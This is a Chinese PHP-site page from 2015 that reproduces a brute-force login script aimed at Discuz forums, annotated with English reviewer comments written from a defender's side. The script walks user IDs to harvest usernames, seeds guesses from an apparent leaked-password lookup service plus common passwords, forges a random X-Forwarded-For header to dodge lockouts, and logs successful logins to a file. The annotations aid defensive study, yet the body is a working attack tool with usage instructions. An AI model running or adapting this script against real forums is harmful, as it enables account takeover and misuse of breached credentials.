
Discuz爆破脚本无视验证码 - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-15 15:00 作者: 阅读:


<?php

/**
 * Online password-guessing client aimed at a Discuz forum, as published on this page.
 *
 * Reviewer notes, read from the defender's side:
 * - crack() walks a numeric uid range, resolves each uid to a username through
 *   the forum's profile page, builds a per-user candidate list, and submits each
 *   candidate to the login endpoint until one is accepted.
 * - getuid() and is_pass() send the same constant User-Agent, Referer and
 *   "Cookie: xx=xx" header on every request and a freshly randomized
 *   X-Forwarded-For value per call. The constants are usable as log signatures;
 *   the changing X-Forwarded-For means throttling or lockout keyed on that
 *   client-supplied header cannot be relied on (take the client address from
 *   the socket or from a trusted proxy only).
 * - The page title claims the captcha is bypassed; the login request built in
 *   is_pass() indeed carries no captcha field. Whether a given server accepts it
 *   depends on its version and configuration, which this listing does not show.
 * - The listing is reproduced as extracted; spacing between keywords was lost,
 *   so it is not runnable as shown.
 */
classfuckdz{

    /**
     * Query a third-party HTTP endpoint for $user and return strings scraped from the reply.
     *
     * $user is interpolated into the query string without URL-encoding. The reply
     * is converted from UTF-8 to GB2312 and matched with a regex; index 0 (the
     * full matches) is dropped and the first remaining entry, i.e. the list of
     * group-1 captures, is returned from inside the loop. crack() uses that list
     * as the start of its candidate passwords.
     *
     * NOTE(review): the endpoint appears to be a leaked-credential lookup service;
     * that is inferred from how the result is used, not confirmed here. The
     * defensive point is credential reuse: screen new and existing passwords
     * against known-breached values and offer a second factor.
     */
    publicfunctionsgk($user){

        $a=file_get_contents("http://www.soyun.org/cha_api.php?so=$user&auto=");

        $a=iconv("UTF-8", "GB2312//IGNORE", $a);

        preg_match_all("/7%\">(.*)</isU",$a,$arr);

        // Drop the full-match list so only the capture-group list remains.
        unset($arr[0]);

        foreach($arras$key=>$r){

            return$r;

            }

    }

     

    /**
     * Fetch the profile page for $uid on $host and return the username shown in its <title>.
     *
     * Returns the text captured before "的个人" in the title, with CR and LF
     * removed, or false when the title pattern does not match.
     *
     * NOTE(review): this is username enumeration by sequential uid. Requiring a
     * session for profile pages, or rate-limiting sequential uid lookups, removes
     * the username list that the rest of the class depends on.
     */
    publicfunctiongetuid($host,$uid){

            // Random dotted quad, each octet in 100..244, sent below as X-Forwarded-For.
            $ip= rand(100, 244).'.'.rand(100, 244).'.'.rand(100, 244).'.'.rand(100, 244);

            // Constant User-Agent / Referer / Cookie plus the forged X-Forwarded-For:
            // the fixed parts are stable indicators in web-server logs.
            $opts= array(   

            'http'=> array(   

            'method'=> 'GET',   

            'header'=> "User-Agent: Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile\r\nReferer:http://www.baidu.com/index.php\r\nX-Forwarded-For: $ip\r\nCookie: xx=xx",

            'timeout'=>15, ) 

            ); 

            $context= stream_context_create($opts); 

             $a=file_get_contents("$host/home.php?mod=space&do=profile&from=space&&uid=$uid",false,$context);

            // Pages that declare UTF-8 are converted to GB2312 before matching.
            if(strpos($a,'charset=utf-8')){

            $a=iconv("UTF-8", "GB2312//IGNORE", $a);

             

            }

             

            if(preg_match("/<title>(.*)的个人/isU",$a,$arr)){

             

            $a=str_replace("\r","",trim($arr[1]));

            return$a=str_replace("\n","",$a);

            }else{

            returnfalse;

            }

             

    }

     

    /**
     * Submit one username/password pair to the forum login endpoint and report whether it was accepted.
     *
     * The pair is sent as query-string parameters of a GET request, so each
     * attempt, password included, is visible in access and proxy logs as a
     * request to member.php with mod=logging and action=login. The attempt is
     * treated as successful when the response body contains
     * "window.location.href"; otherwise false is returned.
     *
     * NOTE(review): mitigations belong on the server side of this request:
     * enforce captcha and attempt limits on every login path, including this
     * inajax/quick-login variant, and count failures per account rather than per
     * client-supplied address.
     */
    publicfunctionis_pass($host,$user,$pass){

            // Same forged-source construction as getuid(): a new random value per attempt.
            $ip= rand(100, 244).'.'.rand(100, 244).'.'.rand(100, 244).'.'.rand(100, 244);

            $opts= array(   

            'http'=> array(   

            'method'=> 'GET',   

            'header'=> "User-Agent: Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile\r\nReferer:http://www.baidu.com/index.php\r\nX-Forwarded-For: $ip\r\nCookie: xx=xx",

            'timeout'=>15, ) 

            ); 

              

            $context= stream_context_create($opts); 

             $a=file_get_contents("$host/member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes&inajax=1&handlekey=ls&quickforward=yes&username=$user&password=$pass",false,$context);



            if(strpos($a,"window.location.href")){

                returntrue;

            }else{

                returnfalse;

            }

     

    }

    /**
     * Drive the whole run for uids $a through $b (inclusive) on $host.
     *
     * For each uid: resolve the username with getuid() (skipping uids that
     * return false), take the list from sgk(), append a fixed set of common
     * passwords and three username-derived values, then call is_pass() for each
     * candidate in order and stop at the first accepted one. Progress is echoed
     * and accepted pairs are appended to ok.txt in the working directory as
     * "user---password" lines.
     *
     * NOTE(review): in server logs this appears as one profile fetch followed
     * by a burst of login requests for the same username, repeated for
     * consecutive uids. A password policy that rejects the literals below and
     * any password containing the username defeats the built-in list.
     */
    publicfunctioncrack($host,$a,$b){

    // Normalize the target to "http://<host>/" regardless of how it was passed.
    $host=str_replace("http://","",$host);

    $host="http://".$host."/";

    for($vip=$a;$vip<=$b;$vip++){ 

         

        if(!($user=$this->getuid($host,$vip))){

         

         continue;

        }

        $pass=$this->sgk($user);

        // Fixed common-password literals and username-derived variants.
        array_push($pass,"123456");

        array_push($pass,"654321");

        array_push($pass,"123123");

        array_push($pass,"woaini");

        array_push($pass,"caonima");

        array_push($pass,"12345");

        array_push($pass,"12345789");

        array_push($pass,"5201314");

        array_push($pass,"1314520");

        array_push($pass,$user);

        array_push($pass,$user."123456");

        array_push($pass,"abc123");

        array_push($pass,$user."..");

         

            // One login request per candidate; the loop ends when the index is no longer set.
            for($i=0;isset($pass[$i]);$i++){ 

                echo"\r\n正在爆破UID:$vip-[".$user."]---".$pass[$i]."";

                if($this->is_pass($host,$user,$pass[$i])){

                        echo"爆破成功!\r\n--------------------";

                        // Accepted pairs are written in plaintext; ok.txt is a host artifact of a run.
                        file_put_contents("ok.txt", $user."---".$pass[$i]."\r\n",FILE_APPEND);

                        break;

                         

                    }else{

                        echo"爆破失败";

                    }

                 

  

                } 

      

  

  

        }

    }

     

     

}

// Command-line entry: instantiate the class, silence PHP error output and
// remove the execution time limit so a long run is not interrupted.
$f=newfuckdz();

error_reporting(0);

set_time_limit(0);

// With no first argument, print the usage banner (target URL, first uid, last uid;
// results go to ok.txt) and do nothing else.
if(empty($argv[1])){

print_r("

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++   

      开始爆破:php.exe $argv[0] 网址 起始uid 结束uid 

      示例: php.exe $argv[0] http://phpinfo.me/ 1 255

      结果保存在ok.txt里



      Blog:http://phpinfo.me

     

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++   \n\n\n

");

}else{

// $argv[1] is already known to be non-empty here, so the inner else branch is
// never taken. $argv[2] and $argv[3] are passed to crack() without any check.
if(!empty($argv[1])){

  

    $f->crack($argv[1],$argv[2],$argv[3]);

  }else{

    echo"逗比";

 }

 }

 ?>



 
